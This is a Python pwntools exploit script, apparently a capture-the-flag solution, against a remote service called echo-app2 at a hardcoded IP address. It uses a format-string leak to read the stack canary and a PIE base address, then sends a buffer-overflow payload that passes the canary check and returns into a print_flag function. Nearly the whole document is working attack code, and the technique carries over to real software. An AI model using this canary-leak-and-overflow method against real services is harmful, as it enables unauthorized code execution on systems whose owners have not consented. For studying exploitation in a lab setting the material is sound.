#!/usr/bin/python3
"""Proof-of-concept against ./echo-app2: a format-string read leaks two stack
values (the stack canary and an address inside the binary), which are then
used to build a stack-smashing payload that returns into print_flag.

Both the stack protector and PIE are only bypassed because the service echoes
the caller-supplied format string back; without that leak neither value is
known to the client."""

from pwn import *

# Load the target ELF so its symbols (print_flag) resolve and the pwntools
# context (arch, endianness, word size used by p64) follows the binary.
# checksec=False only suppresses the security-properties printout on load.
context.binary = target = ELF("./echo-app2", checksec=False)

# r = process()   # local run against the same binary (disabled)

# Remote instance of the service.
r = remote("54.85.45.101", 8009)

# funcs
# Shorthand: send one line to the service.
s = lambda a: r.sendline(a)

# leak
# Positional format directives: the reply is expected to contain the 39th and
# 42nd vararg slots printed as pointers, separated by ".".
buf = b"%39$p.%42$p"
s(buf)
# Read up to 34 bytes of the echoed reply as str and split on the separator.
# NOTE(review): assumes the reply is exactly 34 bytes wide -- confirm against
# the service output.
leaks: list[str] = r.recvS(34).split(".")
# The first value is treated as the stack canary (hex text produced by %p).
canary: int = int(leaks[0], 16)
log.info("canary: %#x", canary)
# The second value is a pointer into the PIE binary; 0x15a1 is presumably its
# offset from the load base, so the subtraction yields the base (TODO confirm).
# The log label says "main", but the value assigned is the ELF base address.
target.address = int(leaks[1], 16)-0x15a1
log.info("main: %#x", target.address)

# buf
# Overflow payload: 264 filler bytes up to the canary slot, the leaked canary
# so the stack-protector check passes, 8 bytes for the following slot
# (presumably the saved frame pointer), then print_flag's resolved address in
# the slot presumably holding the saved return address.
buf = b"A"*264
buf += p64(canary)
buf += p64(0)
buf += p64(target.sym.print_flag)
s(buf)

r.interactive()